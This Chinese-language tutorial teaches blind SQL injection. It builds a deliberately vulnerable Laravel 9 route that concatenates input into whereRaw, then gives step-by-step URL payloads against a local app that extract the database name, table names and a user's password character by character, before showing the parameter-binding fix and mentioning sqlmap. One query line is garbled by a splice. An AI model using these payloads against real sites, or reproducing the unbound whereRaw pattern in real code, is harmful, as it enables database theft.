【相關推薦:】
環境
composer create-project laravel/laravel lar9 // 安裝laravel9 // 編輯.env 修改為DEBUG=false 設定資料庫 DEBUG=false DB_HOST=.... php artisan migrate php artisan serve // 啟動 // 插入資料 insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');
建立漏洞
// routes/web.php Route::get('/', function () { $id = request()->id; $user = \App\Models\User::whereRaw('id = '.$id)->first(); return $user->name ?? ''; }); // 最後轉換的sql是: select * from users where id = $id
測試
http://127.0.0.1:8000/?id=1' // 500 http://127.0.0.1:8000/?id=1 and 1=2 // select * from users where id = 1 and 1=2; 返回空 http://127.0.0.1:8000/?id=1 and 1=1 // select * from users where id = 1 and 1=1 返回xxh
資料庫名
猜出資料名長度
url: http://127.0.0.1:8000/?id=1 and length(database()) = 1 select * from users where id = 1 and length(database()) = 1 select * from users where id = 1 and length(database()) = 2 // 一直迴圈下去
猜出資料庫名
從第一步 知道了資料庫名長度 `select * from users where id = 1 and substr(database(),1,1) =a` `select * from users where id = 1 and substr(database(),1,1) =b` // 一直迴圈下去 找到資料庫名的第一個做字元 然後找第二個字元 直到找完資料庫名的長度
最終: laravel_project
表名
以下的步驟和猜資料庫差不多,就簡說了。
information_schema
information_schema 是 mysql 自帶的,
資料庫名 表名 列型別 等都有記錄,猜表 欄位明需要從這個資料庫來。
猜 laravel_project 的表數量
url: http://127.0.0.1:8000/?id=1 and (select count(*) from information_schema.tables where table_schema ="laravel_project" ) = 5 mysql> select count(*) from information_schema.tables where table_schema ="laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct"; +----------+ | count(*) | +----------+ | 5 | +----------+
猜第一個表名的長度
與 [猜出資料名長度] 此不多。
猜第一個表名
url: http://127.0.0.1:8000/?id=1 and ( select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1) = 'f' mysql> select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1; +------------------------+ | substr(table_name,1,1) | +------------------------+ | f | +------------------------+ // 得出第一個表的第一個欄位是f 然後查第
最終得出第一個表名稱為: failed_jobs
猜欄位
和猜表一模一樣的邏輯。
select count(column_name) from information_schema.columns where table_name= 'failed_jobs'; // fail_jobs欄位總數
猜資料
資料這才是最重要的。
因為 failed_jobs 沒資料,所以我換成 users 來。
users 有個 password 欄位。
mysql> select substr((select password from users limit 0,1),1,1); +----------------------------------------------------+ | substr((select password from users limit 0,1),1,1) | +----------------------------------------------------+ | w | +----------------------------------------------------+ 得出第一個是w,存起來,最後判斷 mysql> select substr((select password from users limit 0,1),1,2); +----------------------------------------------------+ | substr((select password from users limit 0,1),1,2) | +----------------------------------------------------+ | wo | +----------------------------------------------------+ 第二個值為o 用第一個值 + 第二個值作為盲注
……
防禦
(有時候 where 不滿足需求,就需要 whereRaw)
如果需要,記得繫結就好。
Route::get('/', function () { $id = request()->id; $user = \App\Models\User::whereRaw('id = ?',[$id])->first(); return $user->name ?? ''; });
只要安份的用框架,不會會漏洞的。
那些老專案,漏洞滿地飛。
現在這個時代,找漏洞難登天。
Ps
上面為了講解簡單,用是最簡單的查詢。
手工盲注應該用二分查詢。
select * from users where id = 1 and substr(database(),1,1) ='a'; 換成二分: select * from users where id = 1 and ascii(substr(database(),1,1)) > 99;
最好還是直接藉助工具 sqlmap, 直接掃出來。
【相關推薦:】
以上就是通過laravel漏洞範例解析sql盲注原理的詳細內容,更多請關注TW511.COM其它相關文章!